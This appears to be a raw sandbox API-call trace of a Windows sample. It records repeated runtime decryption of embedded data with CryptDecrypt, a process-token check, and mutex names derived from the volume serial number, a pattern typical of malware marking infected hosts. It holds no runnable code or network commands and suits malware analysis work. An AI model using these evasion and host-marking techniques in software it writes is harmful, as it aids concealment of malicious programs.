[0038.154] GetLastError () returned 0x0 [0038.154] SetLastError (dwErrCode=0x0) [0038.154] GetLastError () returned 0x0 [0038.154] SetLastError (dwErrCode=0x0) [0038.154] GetLastError () returned 0x0 [0038.154] SetLastError (dwErrCode=0x0) [0038.154] GetLastError () returned 0x0 [0038.155] SetLastError (dwErrCode=0x0) [0038.155] GetLastError () returned 0x0 [0038.155] SetLastError (dwErrCode=0x0) [0038.155] GetLastError () returned 0x0 [0038.155] SetLastError (dwErrCode=0x0) [0038.155] GetLastError () returned 0x0 [0038.155] SetLastError (dwErrCode=0x0) [0038.155] GetLastError () returned 0x0 [0038.155] SetLastError (dwErrCode=0x0) [0038.155] GetLastError () returned 0x0 [0038.155] SetLastError (dwErrCode=0x0) [0038.155] GetLastError () returned 0x0 [0038.155] SetLastError (dwErrCode=0x0) [0038.155] GetLastError () returned 0x0 [0038.155] SetLastError (dwErrCode=0x0) [0038.155] GetLastError () returned 0x0 [0038.155] SetLastError (dwErrCode=0x0) [0038.155] GetLastError () returned 0x0 [0038.155] SetLastError (dwErrCode=0x0) [0038.156] GetLastError () returned 0x0 [0038.156] SetLastError (dwErrCode=0x0) [0038.156] GetLastError () returned 0x0 [0038.156] SetLastError (dwErrCode=0x0) [0038.156] GetLastError () returned 0x0 [0038.156] SetLastError (dwErrCode=0x0) [0038.156] GetLastError () returned 0x0 [0038.156] SetLastError (dwErrCode=0x0) [0038.156] GetLastError () returned 0x0 [0038.156] SetLastError (dwErrCode=0x0) [0038.156] GetLastError () returned 0x0 [0038.156] SetLastError (dwErrCode=0x0) [0038.156] GetLastError () returned 0x0 [0038.156] SetLastError (dwErrCode=0x0) [0038.156] GetLastError () returned 0x0 [0038.156] SetLastError (dwErrCode=0x0) [0038.156] GetLastError () returned 0x0 [0038.156] SetLastError (dwErrCode=0x0) [0038.156] GetLastError () returned 0x0 [0038.156] SetLastError (dwErrCode=0x0) [0038.156] GetLastError () returned 0x0 [0038.157] SetLastError (dwErrCode=0x0) [0038.157] GetLastError () returned 0x0 [0038.157] SetLastError (dwErrCode=0x0) [0038.157] GetLastError () returned 0x0 [0038.157] SetLastError (dwErrCode=0x0) [0038.157] GetLastError () returned 0x0 [0038.157] SetLastError (dwErrCode=0x0) [0038.157] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x37) returned 0x8c1990 [0038.157] GetLastError () returned 0x0 [0038.157] SetLastError (dwErrCode=0x0) [0038.157] GetLastError () returned 0x0 [0038.157] SetLastError (dwErrCode=0x0) [0038.157] GetLastError () returned 0x0 [0038.157] SetLastError (dwErrCode=0x0) [0038.157] GetLastError () returned 0x0 [0038.157] SetLastError (dwErrCode=0x0) [0038.157] GetLastError () returned 0x0 [0038.157] SetLastError (dwErrCode=0x0) [0038.157] GetLastError () returned 0x0 [0038.157] SetLastError (dwErrCode=0x0) [0038.158] GetLastError () returned 0x0 [0038.158] SetLastError (dwErrCode=0x0) [0038.158] GetLastError () returned 0x0 [0038.158] SetLastError (dwErrCode=0x0) [0038.158] GetLastError () returned 0x0 [0038.158] SetLastError (dwErrCode=0x0) [0038.158] GetLastError () returned 0x0 [0038.158] SetLastError (dwErrCode=0x0) [0038.158] GetLastError () returned 0x0 [0038.158] SetLastError (dwErrCode=0x0) [0038.158] GetLastError () returned 0x0 [0038.158] SetLastError (dwErrCode=0x0) [0038.158] GetLastError () returned 0x0 [0038.158] SetLastError (dwErrCode=0x0) [0038.158] GetLastError () returned 0x0 [0038.158] SetLastError (dwErrCode=0x0) [0038.158] GetLastError () returned 0x0 [0038.158] SetLastError (dwErrCode=0x0) [0038.158] GetLastError () returned 0x0 [0038.158] SetLastError (dwErrCode=0x0) [0038.158] GetLastError () returned 0x0 [0038.159] SetLastError (dwErrCode=0x0) [0038.159] GetLastError () returned 0x0 [0038.159] SetLastError (dwErrCode=0x0) [0038.159] GetLastError () returned 0x0 [0038.159] SetLastError (dwErrCode=0x0) [0038.159] GetLastError () returned 0x0 [0038.159] SetLastError (dwErrCode=0x0) [0038.159] GetLastError () returned 0x0 [0038.159] SetLastError (dwErrCode=0x0) [0038.159] GetLastError () returned 0x0 [0038.159] SetLastError (dwErrCode=0x0) [0038.159] GetLastError () returned 0x0 [0038.159] SetLastError (dwErrCode=0x0) [0038.159] GetLastError () returned 0x0 [0038.159] SetLastError (dwErrCode=0x0) [0038.159] GetLastError () returned 0x0 [0038.159] SetLastError (dwErrCode=0x0) [0038.159] GetLastError () returned 0x0 [0038.159] SetLastError (dwErrCode=0x0) [0038.159] GetLastError () returned 0x0 [0038.160] SetLastError (dwErrCode=0x0) [0038.160] GetLastError () returned 0x0 [0038.160] SetLastError (dwErrCode=0x0) [0038.160] GetLastError () returned 0x0 [0038.160] SetLastError (dwErrCode=0x0) [0038.160] GetLastError () returned 0x0 [0038.160] SetLastError (dwErrCode=0x0) [0038.160] GetLastError () returned 0x0 [0038.160] SetLastError (dwErrCode=0x0) [0038.160] GetLastError () returned 0x0 [0038.160] SetLastError (dwErrCode=0x0) [0038.160] GetLastError () returned 0x0 [0038.160] SetLastError (dwErrCode=0x0) [0038.160] GetLastError () returned 0x0 [0038.160] SetLastError (dwErrCode=0x0) [0038.160] GetLastError () returned 0x0 [0038.160] SetLastError (dwErrCode=0x0) [0038.160] GetLastError () returned 0x0 [0038.160] SetLastError (dwErrCode=0x0) [0038.160] GetLastError () returned 0x0 [0038.161] SetLastError (dwErrCode=0x0) [0038.161] GetLastError () returned 0x0 [0038.161] SetLastError (dwErrCode=0x0) [0038.161] GetLastError () returned 0x0 [0038.161] SetLastError (dwErrCode=0x0) [0038.161] GetLastError () returned 0x0 [0038.161] SetLastError (dwErrCode=0x0) [0038.161] GetLastError () returned 0x0 [0038.161] SetLastError (dwErrCode=0x0) [0038.161] GetLastError () returned 0x0 [0038.161] SetLastError (dwErrCode=0x0) [0038.161] GetLastError () returned 0x0 [0038.161] SetLastError (dwErrCode=0x0) [0038.161] GetLastError () returned 0x0 [0038.161] SetLastError (dwErrCode=0x0) [0038.161] GetLastError () returned 0x0 [0038.161] SetLastError (dwErrCode=0x0) [0038.161] GetLastError () returned 0x0 [0038.161] SetLastError (dwErrCode=0x0) [0038.161] GetLastError () returned 0x0 [0038.161] SetLastError (dwErrCode=0x0) [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x98) returned 0x8c19d0 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1f) returned 0x8c1a70 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x36) returned 0x8c1a98 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x37) returned 0x8c1ad8 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x3c) returned 0x8c1b18 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x31) returned 0x8c1b60 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x17) returned 0x8c1ba0 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x24) returned 0x8c1bc0 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x14) returned 0x8c1bf0 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0xd) returned 0x8c1c10 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x25) returned 0x8c1c28 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x39) returned 0x8c1c58 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x18) returned 0x8c1ca0 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x17) returned 0x8c1cc0 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0xe) returned 0x8c1ce0 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x69) returned 0x8c1cf8 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x3e) returned 0x8c1d70 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1b) returned 0x8c1db8 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1d) returned 0x8c1de0 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x48) returned 0x8c1e08 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x12) returned 0x8c1e58 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x18) returned 0x8c1e78 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1b) returned 0x8c1e98 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x24) returned 0x8c1ec0 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x29) returned 0x8c1ef0 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1f28 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x41) returned 0x8c1f50 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x17) returned 0x8c1fa0 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0xf) returned 0x8c1fc0 [0038.162] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x16) returned 0x8c1fd8 [0038.163] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x2a) returned 0x8c1ff8 [0038.163] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x29) returned 0x8c2030 [0038.163] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x15) returned 0x8c2068 [0038.163] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c2088 [0038.163] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x2a) returned 0x8c20b0 [0038.163] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x12) returned 0x8c20e8 [0038.163] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x18) returned 0x8c2108 [0038.163] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x46) returned 0x8c2128 [0038.163] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c11f8 | out: hHeap=0x8c0000) returned 1 [0038.163] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0038.163] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x80) returned 0x8c11f8 [0038.164] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1248136) returned 0x0 [0038.164] RtlSizeHeap (HeapHandle=0x8c0000, Flags=0x0, MemoryPointer=0x8c11f8) returned 0x80 [0038.164] GetLastError () returned 0x0 [0038.164] SetLastError (dwErrCode=0x0) [0038.164] GetLastError () returned 0x0 [0038.164] SetLastError (dwErrCode=0x0) [0038.164] GetLastError () returned 0x0 [0038.164] SetLastError (dwErrCode=0x0) [0038.164] GetLastError () returned 0x0 [0038.165] SetLastError (dwErrCode=0x0) [0038.165] GetLastError () returned 0x0 [0038.165] SetLastError (dwErrCode=0x0) [0038.165] GetLastError () returned 0x0 [0038.165] SetLastError (dwErrCode=0x0) [0038.165] GetLastError () returned 0x0 [0038.165] SetLastError (dwErrCode=0x0) [0038.165] GetLastError () returned 0x0 [0038.165] SetLastError (dwErrCode=0x0) [0038.165] GetLastError () returned 0x0 [0038.165] SetLastError (dwErrCode=0x0) [0038.165] GetLastError () returned 0x0 [0038.165] SetLastError (dwErrCode=0x0) [0038.165] GetLastError () returned 0x0 [0038.165] SetLastError (dwErrCode=0x0) [0038.165] GetLastError () returned 0x0 [0038.165] SetLastError (dwErrCode=0x0) [0038.165] GetLastError () returned 0x0 [0038.165] SetLastError (dwErrCode=0x0) [0038.165] GetLastError () returned 0x0 [0038.166] SetLastError (dwErrCode=0x0) [0038.166] GetLastError () returned 0x0 [0038.166] SetLastError (dwErrCode=0x0) [0038.166] GetLastError () returned 0x0 [0038.166] SetLastError (dwErrCode=0x0) [0038.166] GetLastError () returned 0x0 [0038.166] SetLastError (dwErrCode=0x0) [0038.166] GetLastError () returned 0x0 [0038.166] SetLastError (dwErrCode=0x0) [0038.166] GetLastError () returned 0x0 [0038.166] SetLastError (dwErrCode=0x0) [0038.166] GetLastError () returned 0x0 [0038.166] SetLastError (dwErrCode=0x0) [0038.166] GetLastError () returned 0x0 [0038.166] SetLastError (dwErrCode=0x0) [0038.166] GetLastError () returned 0x0 [0038.166] SetLastError (dwErrCode=0x0) [0038.166] GetLastError () returned 0x0 [0038.166] SetLastError (dwErrCode=0x0) [0038.166] GetLastError () returned 0x0 [0038.167] SetLastError (dwErrCode=0x0) [0038.167] GetLastError () returned 0x0 [0038.167] SetLastError (dwErrCode=0x0) [0038.167] GetLastError () returned 0x0 [0038.167] SetLastError (dwErrCode=0x0) [0038.167] GetLastError () returned 0x0 [0038.167] SetLastError (dwErrCode=0x0) [0038.167] GetLastError () returned 0x0 [0038.167] SetLastError (dwErrCode=0x0) [0038.167] GetLastError () returned 0x0 [0038.167] SetLastError (dwErrCode=0x0) [0038.167] GetLastError () returned 0x0 [0038.167] SetLastError (dwErrCode=0x0) [0038.167] GetLastError () returned 0x0 [0038.167] SetLastError (dwErrCode=0x0) [0038.167] GetLastError () returned 0x0 [0038.167] SetLastError (dwErrCode=0x0) [0038.167] GetLastError () returned 0x0 [0038.167] SetLastError (dwErrCode=0x0) [0038.168] GetLastError () returned 0x0 [0038.168] SetLastError (dwErrCode=0x0) [0038.168] GetLastError () returned 0x0 [0038.169] SetLastError (dwErrCode=0x0) [0038.169] GetLastError () returned 0x0 [0038.169] SetLastError (dwErrCode=0x0) [0038.169] GetLastError () returned 0x0 [0038.169] SetLastError (dwErrCode=0x0) [0038.169] GetLastError () returned 0x0 [0038.169] SetLastError (dwErrCode=0x0) [0038.169] GetLastError () returned 0x0 [0038.169] SetLastError (dwErrCode=0x0) [0038.169] GetLastError () returned 0x0 [0038.169] SetLastError (dwErrCode=0x0) [0038.169] GetLastError () returned 0x0 [0038.169] SetLastError (dwErrCode=0x0) [0038.170] GetLastError () returned 0x0 [0038.170] SetLastError (dwErrCode=0x0) [0038.170] GetLastError () returned 0x0 [0038.170] SetLastError (dwErrCode=0x0) [0038.170] GetLastError () returned 0x0 [0038.170] SetLastError (dwErrCode=0x0) [0038.170] GetLastError () returned 0x0 [0038.170] SetLastError (dwErrCode=0x0) [0038.170] GetLastError () returned 0x0 [0038.170] SetLastError (dwErrCode=0x0) [0038.170] GetLastError () returned 0x0 [0038.170] SetLastError (dwErrCode=0x0) [0038.170] GetLastError () returned 0x0 [0038.171] SetLastError (dwErrCode=0x0) [0038.172] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x30) returned 0x8c1280 [0038.172] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x3300) returned 0x8c2178 [0038.172] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x15c) returned 0x8c12b8 [0038.172] GetTickCount () returned 0x1a053 [0038.172] GetLastError () returned 0x0 [0038.172] SetLastError (dwErrCode=0x0) [0038.173] GetLocaleInfoW (in: Locale=0x800, LCType=0x58, lpLCData=0x1afc98, cchData=32 | out: lpLCData="\x03") returned 16 [0038.174] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1c) returned 0x8c1420 [0038.174] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1c) returned 0x8c1448 [0038.174] GetVersion () returned 0x1db10106 [0038.174] GetCurrentProcess () returned 0xffffffff [0038.174] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x1afbfc | out: TokenHandle=0x1afbfc*=0x80) returned 1 [0038.174] GetTokenInformation (in: TokenHandle=0x80, TokenInformationClass=0x14, TokenInformation=0x1afbf4, TokenInformationLength=0x4, ReturnLength=0x1afbf8 | out: TokenInformation=0x1afbf4, ReturnLength=0x1afbf8) returned 1 [0038.174] CloseHandle (hObject=0x80) returned 1 [0038.174] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1470 [0038.175] CryptAcquireContextW (in: phProv=0x124fcf0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x124fcf0*=0x2e4fe0) returned 1 [0038.607] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afaf0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb58 | out: phKey=0x1afb58*=0x2e4dc8) returned 1 [0038.611] CryptSetKeyParam (hKey=0x2e4dc8, dwParam=0x1, pbData=0x1afb40, dwFlags=0x0) returned 1 [0038.612] CryptDecrypt (in: hKey=0x2e4dc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0x1afb0c | out: pbData=0x8c1470, pdwDataLen=0x1afb0c) returned 1 [0038.614] CryptDestroyKey (hKey=0x2e4dc8) returned 1 [0038.614] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1498 [0038.614] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14c0 [0038.615] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c14e8 [0038.615] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afac8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb30 | out: phKey=0x1afb30*=0x2e4dc8) returned 1 [0038.615] CryptSetKeyParam (hKey=0x2e4dc8, dwParam=0x1, pbData=0x1afb18, dwFlags=0x0) returned 1 [0038.615] CryptDecrypt (in: hKey=0x2e4dc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14e8, pdwDataLen=0x1afae4 | out: pbData=0x8c14e8, pdwDataLen=0x1afae4) returned 1 [0038.615] CryptDestroyKey (hKey=0x2e4dc8) returned 1 [0038.615] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14e8 | out: hHeap=0x8c0000) returned 1 [0038.615] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0038.615] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14c0 | out: hHeap=0x8c0000) returned 1 [0038.615] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0038.615] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x1afb98, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1afb98*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0038.616] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1498 | out: hHeap=0x8c0000) returned 1 [0038.616] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1470 [0038.616] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afb24, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb8c | out: phKey=0x1afb8c*=0x2e4dc8) returned 1 [0038.616] CryptSetKeyParam (hKey=0x2e4dc8, dwParam=0x1, pbData=0x1afb74, dwFlags=0x0) returned 1 [0038.616] CryptDecrypt (in: hKey=0x2e4dc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0x1afb40 | out: pbData=0x8c1470, pdwDataLen=0x1afb40) returned 1 [0038.616] CryptDestroyKey (hKey=0x2e4dc8) returned 1 [0038.616] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14b8 [0038.616] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x0 [0038.616] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4200") returned 0x84 [0038.616] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x0 [0038.617] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0038.617] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14b8 | out: hHeap=0x8c0000) returned 1 [0038.617] ReleaseMutex (hMutex=0x84) returned 1 [0038.617] CloseHandle (hObject=0x84) returned 1 [0038.617] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1470 [0038.617] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afb04, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb6c | out: phKey=0x1afb6c*=0x2e4dc8) returned 1 [0038.617] CryptSetKeyParam (hKey=0x2e4dc8, dwParam=0x1, pbData=0x1afb54, dwFlags=0x0) returned 1 [0038.617] CryptDecrypt (in: hKey=0x2e4dc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0x1afb20 | out: pbData=0x8c1470, pdwDataLen=0x1afb20) returned 1 [0038.617] CryptDestroyKey (hKey=0x2e4dc8) returned 1 [0038.617] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1498 [0038.617] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14c0 [0038.617] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c14e8 [0038.617] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afadc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb44 | out: phKey=0x1afb44*=0x2e4dc8) returned 1 [0038.617] CryptSetKeyParam (hKey=0x2e4dc8, dwParam=0x1, pbData=0x1afb2c, dwFlags=0x0) returned 1 [0038.617] CryptDecrypt (in: hKey=0x2e4dc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14e8, pdwDataLen=0x1afaf8 | out: pbData=0x8c14e8, pdwDataLen=0x1afaf8) returned 1 [0038.617] CryptDestroyKey (hKey=0x2e4dc8) returned 1 [0038.617] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14e8 | out: hHeap=0x8c0000) returned 1 [0038.617] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0038.617] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14c0 | out: hHeap=0x8c0000) returned 1 [0038.617] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0038.617] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x1afbac, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1afbac*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0038.618] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1498 | out: hHeap=0x8c0000) returned 1 [0038.618] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1470 [0038.618] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afb38, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afba0 | out: phKey=0x1afba0*=0x2e4dc8) returned 1 [0038.618] CryptSetKeyParam (hKey=0x2e4dc8, dwParam=0x1, pbData=0x1afb88, dwFlags=0x0) returned 1 [0038.618] CryptDecrypt (in: hKey=0x2e4dc8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0x1afb54 | out: pbData=0x8c1470, pdwDataLen=0x1afb54) returned 1 [0038.618] CryptDestroyKey (hKey=0x2e4dc8) returned 1 [0038.618] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14b8 [0038.618] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4201") returned 0x0 [0038.618] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\00019C354B4201") returned 0x84 [0038.618] WaitForSingleObject (hHandle=0x84, dwMilliseconds=0x0) returned 0x0 [0038.618] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0038.618] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14b8 | out: hHeap=0x8c0000) returned 1 [0038.618] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1241f5f, lpParameter=0x1afc3c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x8c [0038.619] Sleep (dwMilliseconds=0x1388) [0044.938] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x20) returned 0x8c1470 [0044.938] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afaf0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb58 | out: phKey=0x1afb58*=0x2e86f0) returned 1 [0044.938] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afb40, dwFlags=0x0) returned 1 [0044.938] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0x1afb0c | out: pbData=0x8c1470, pdwDataLen=0x1afb0c) returned 1 [0044.938] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.938] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x1e) returned 0x8c1498 [0044.938] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x1e) returned 0x8c14c0 [0044.938] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x90) returned 0x8c14e8 [0044.938] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afac8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb30 | out: phKey=0x1afb30*=0x2e86f0) returned 1 [0044.938] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afb18, dwFlags=0x0) returned 1 [0044.938] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c14e8, pdwDataLen=0x1afae4 | out: pbData=0x8c14e8, pdwDataLen=0x1afae4) returned 1 [0044.938] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.939] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14e8 | out: hHeap=0x8c0000) returned 1 [0044.939] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x8c1498, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0044.939] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c14c0 | out: hHeap=0x8c0000) returned 1 [0044.939] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1470 | out: hHeap=0x8c0000) returned 1 [0044.939] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x1afb98, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x1afb98*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0044.939] HeapFree (in: hHeap=0x8c0000, dwFlags=0x0, lpMem=0x8c1498 | out: hHeap=0x8c0000) returned 1 [0044.939] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x0, Size=0x40) returned 0x8c1470 [0044.939] CryptImportKey (in: hProv=0x2e4fe0, pbData=0x1afb24, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x1afb8c | out: phKey=0x1afb8c*=0x2e86f0) returned 1 [0044.939] CryptSetKeyParam (hKey=0x2e86f0, dwParam=0x1, pbData=0x1afb74, dwFlags=0x0) returned 1 [0044.939] CryptDecrypt (in: hKey=0x2e86f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x8c1470, pdwDataLen=0x1afb40 | out: pbData=0x8c1470, pdwDataLen=0x1afb40) returned 1 [0044.939] CryptDestroyKey (hKey=0x2e86f0) returned 1 [0044.939] RtlAllocateHeap (HeapHandle=0x8c0000, Flags=0x8, Size=0x34) returned 0x8c14b8 